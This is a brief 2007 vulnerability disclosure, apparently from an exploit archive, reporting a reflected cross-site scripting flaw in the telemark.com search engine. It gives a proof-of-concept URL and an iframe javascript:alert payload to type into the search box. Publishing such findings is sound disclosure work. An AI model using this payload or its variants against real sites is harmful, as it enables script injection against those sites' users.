Home / os / solaris

telemark-xss.txt

Posted on 31 August 2007

# Title : Telemark XSS # Description : The Telemark (telemark.com) search engine is vulnerable to XSS # Author : Tosser # E-mail : ht7015@gmail.com # Proof : http://telemark.com/results-b.jsp?searchTerm=%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E%3C%2Fiframe%3E&x=51&y=11&domainName=telemark.com&w=false&afdt=In51F73BbzMKEwiLy6KLpZ6OAhUJGRoKHfV_kdQYAyAAMNmNlQ84DQ&searchbox=y or go to telemark.com and type "<iframe src="javascript:alert('XSS')"></iframe>" in the search box.

 

TOP